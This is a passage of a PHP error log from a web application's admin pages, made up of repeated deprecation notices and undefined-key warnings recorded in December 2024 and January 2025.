parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:59:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:59:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 13:45:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 13:46:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 13:46:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 13:59:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 13:59:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 13:59:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 13:59:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:00:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:00:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:03:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:03:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:08:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:08:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:16:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:16:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:17:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:17:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:17:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:17:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:18:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:18:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:19:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:19:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:19:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:19:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:20:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:20:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:20:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:22:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:23:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:10:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:10:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 15:39:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:40:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 15:40:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 15:56:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:56:49 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [19-Dec-2024 15:57:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [19-Dec-2024 15:59:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 15:59:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 15:59:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 15:59:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 16:04:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:09:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:20:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:20:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:25:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:11:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:11:48 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [20-Dec-2024 11:35:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:35:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 11:35:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 11:37:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 11:37:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 12:53:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 12:53:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [20-Dec-2024 13:13:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 13:13:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 13:13:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 13:52:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 13:52:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 13:52:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 17:50:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:24:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:25:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:25:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:43:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:43:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:44:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:44:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:44:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:45:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:45:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:46:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:23:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:24:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 14:24:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 14:28:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:36:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:55:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:56:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 16:56:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 16:59:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:59:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 16:59:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:02:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Dec-2024 17:02:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Dec-2024 17:02:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:02:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:40:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:40:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:43:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 17:44:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 18:30:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 18:30:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 18:30:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Dec-2024 09:13:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Dec-2024 09:14:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Dec-2024 09:14:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Dec-2024 09:14:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 10:56:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:14:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:59:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:02:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:20:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:21:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:31:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:42:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 13:56:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:22:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:22:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:26:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:26:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:30:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:32:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 14:42:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 15:50:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 15:50:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 15:50:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 15:50:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:27:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 16:27:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:27:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:29:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:29:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:58:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 16:58:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:58:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 18:19:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 18:19:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 18:19:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 18:21:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 18:21:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 09:24:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 09:25:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 09:25:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 10:04:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 10:04:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 10:04:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 